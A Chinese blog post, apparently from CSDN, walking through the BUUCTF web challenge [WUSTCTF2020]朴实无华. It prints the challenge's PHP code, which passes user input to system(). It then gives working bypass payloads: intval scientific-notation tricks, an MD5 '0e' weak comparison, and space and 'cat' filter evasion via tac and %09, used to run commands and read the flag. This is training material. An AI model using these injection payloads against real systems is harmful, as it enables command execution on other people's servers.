web buuctf [WUSTCTF2020]朴实无华

最新推荐文章于 2024-04-09 20:18:30 发布
最新推荐文章于 2024-04-09 20:18:30 发布
阅读量394 收藏 3
点赞数
文章标签: 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/123890811
版权

1.

根据提示消息应该在头部

2.查看robots.txt (搜索引擎中访问网站的时候要查看的第一个文件)

访问

 

3.根据头部查看请求头和响应头

 

4.查看,打开网页里面对汉字的编译是乱码 ,在火狐浏览器中定制工具里有一个页面编辑的选项,对页面进行编辑,得到源码:

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

5.

if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}

之前的题目里有对intval()的利用,当里面是科学计数法的时候会只去前面的整数

intval(1e9)=1

然而+1会对里面的值进行转换,就不是科学计数法了

所以可以令num=1e9

6.

if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

md5的绕过,在弱类型比较下值本身与其md5后的值相同,也需要利用科学计数法的漏洞

0e任何数=0  也就是使该值经过md5后仍然是0e开头的值即可,可以编写脚本,我直接从网上找到值,可以令md5=0e215962017

7.

if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}

 

 可以看出这个函数的作用就是过滤,一是空格,而是cat

关于空格的绕过

关于cat的绕过可以利用tac(tac: 从最后一行开始显示,可以看出 tac 是 cat 的反向显示) 

即令get_flag=tac$IFSflag

所以payload: num=1e9&md5=0e215962017&get_flag=tac%09flag

7.看来是路径不对

num=1e9&md5=0e215962017&get_flag=ls

 

 8.num=1e9&md5=0e215962017&get_flag=tac%09fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

 

半杯雨水敬过客
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
note:就是一个朴实无华的笔记本
04-02
这个名为"note:就是一个朴实无华的笔记本"的压缩包文件,可能是某个开发者或学习者整理的关于特定主题——对数序列的学习资料。对数序列在数学和计算机科学中有着重要的应用,尤其是在算法分析和复杂度计算中。 ...
logseq:就是一个朴实无华的笔记本
03-29
《logseq:构建个人知识库的实用工具》 在当今信息爆炸的时代,管理和组织个人知识变得至关重要。logseq,正如其名,是一个简洁而强大的笔记本应用,专为那些寻求高效知识管理的人士设计。它以其独特的功能和灵活性...
【网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6187
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
[WUSTCTF2020]朴实无华
qq_43801002的博客
04-29 1959
题目: 题目一打开显示乱码,我们用火狐浏览器调整一下编码就OK,但是不知道为什么qq浏览器调整之后还是不行 火狐浏览器->三道杠->更多->文字编码->Unicode就可以了 痛苦才刚刚开始 1.看到bot字眼,第一眼想到buu的bot机器人,然后就想到robots.txt网站的爬虫规则,访问一下,果然有料 2.访问一下fAke_f1agggg.php,我就知道不会...
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7504
BUUCTF题目Misc部分wp(持续更新)
BUUCTF Misc杂项前十二道题的思路和感悟
热门推荐
太阳照耀我走四方
08-18 1万+
title: BUUCTF Misc date: 2021年8月18日 17点27分 tags: MISC categories: MISC 1、BUUCTF 签到题 直接告诉了flag。 2、BUUCTF 第二题(Stegsolve) 下载附件之后,得到一个gif动图。 使用Stegsolve打开。 然后一张一张的向后翻, 得到flag{he11ohongke} 3、BUUCTF 二维码(QR Research、Ziperrllo、winhex) 下载附件之后是一个zip压缩包。 解压之后得到.
[WUSTCTF2020]朴实无华1--writeup
m0_65080524的博客
08-15 186
而1e4其实等于10000 这是一种科学计数法,具体来说,1e4 中的 1 表示基数(也称为尾数或有效数字),而 4 表示指数。这可以解释为 1 乘以 10 的 4 次方,即 1 * 10^4,等于 10000。要求是原值与md5值进行弱比较相等 而有一个值正好即0e215962017 因为是弱比较,而且0e215962017的md值也是0e开头所以它们弱比较即是0=0。intval()函数作用是在处理数据时会在接触到字符串时停止,即11y58=11,x58=0,1e4=1。发现fl4g.php点开看看。
朴实无华的自我介绍精选.doc
10-11
朴实无华的自我介绍精选 本文档提供了一个完整的自我介绍示例,涵盖了个人基本信息、教育背景、工作经历、职业目标、个人性格等多个方面的内容。以下是本文档中所涉及的知识点: 1. 自我介绍的基本结构:自我介绍...
zapp:朴实无华的用作快速建造项目的基础库
03-19
为快速建造项目的基础库 开始 app := zapp . NewApp ( "test" ) app ....扩展性 组件 我们实现了一些组件,可以在找到 服务 我们实现了一些服务,可以在找到 ...作为一个基础库,我们尽量减少了依赖包,只需要以下包依赖 ...
BUUCTF-逆向
weixin_52125240的博客
04-11 5365
BUUCTF-ReBUUCTF-逆向1.easyre2.reverse13.reverse2 BUUCTF-逆向 1.easyre 先用虚拟机看看是多少位的文件; 拖进IDA看看,一下子就出来了; 2.reverse1 先用虚拟机看看是多少位的文件; 打开IDA,查找字符串; 点击View->Open subviews->Strings 然后观察伪代码 所有的 ’ o ’全都变成 ’ 0 ‘ ; flag{hell0_w0rld} 3.reverse2 一样的看看文件是多少位的;
php下intval()和(int)转换使用与区别
10-30
想知道使用intval()和(int)转换有什么区别?或者说两者有什么不同,包括功能、定义方面的。或者和使用频率、效率等。
WUSTCTF2020-朴实无华
Tajang的大千世界
04-24 396
打开靶机,朴实无华 找线索 左找找右找找,发现robots.txt里有东西 进入/fAke_f1agggg.php是假的(早就预料到了) 在当前页面继续找线索,我都扫了啥都没发现,但更细致点就会发现,网络里的响应头里有个 有一说一,这个线索藏得够深,有二说二,chrome的控制台里网络区太烂了,一层一层的 进入/fl4g.php 我已经开始笑了 代码审计 就一点点读呗,不会的函数百度 绕过分为三个部分并且都是GET传值 intval函数绕过 要变量整数值小于2020,又要变量加1大于2021,一
BUUCTFWeb题解
xuanyulevel6的博客
08-08 5131
BUUCTFWeb题解
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”CTF,先入手杂项部分,
最新发布
m0_73935461的博客
04-09 2297
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”CTF,先入手杂项部分,首先我们先看一些图片的解题思路 图片类型:包含,图片该高宽,文件头损坏,图片隐写(内有压缩包),或者用kali的strings看一下图片内容在进行。可以在文件头中查看。上面标记着png图片,但是文件类型是pk(zip),像这种类型的文件一般是有问题的,我们就可以把这种文件到处去,在进行文件分析。
[WUSTCTF2020]朴实无华1
qq_63169208的博客
07-02 1845
这个真的是各种绕过
【PHP代码审计】ctfshow web入门 php特性 93-104
m0_63563528的博客
08-01 685
假设 “1.php” 是在 $allow 数组中,则会将 <?当访问 “1.php” 时,恶意代码 system(“tac flag36d.php”) 将会被执行,显示名为 “flag36d.php” 的文件内容的逆向(从最后一行到第一行)。正则表达式的含义是任意字符,后面跟着"p",后面跟着任意字符,后面跟着"h",后面再跟着任意字符,最后跟着"p",而。
[WUSTCTF2020]朴实无华 ctf
wuyaowangchuan的博客
11-10 449
[WUSTCTF2020]朴实无华 知识点: intval函数 php MD5 弱比较 tac读取文件 ${IFS}空格绕过 进入环境 robots.txt里面有东西 进去这个文件 好家伙 假的flag 就在这个页面到处看看 响应头里面又有东西 访问 朴实无华,我知道题目为啥叫朴实无华了 接下来代码审计 我电脑的编码好像有问题,中文是乱码 不过问题不大 我去复制别人的 //level 1 if (isset($_GET['num'])){ $num = $_GET['num'];

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值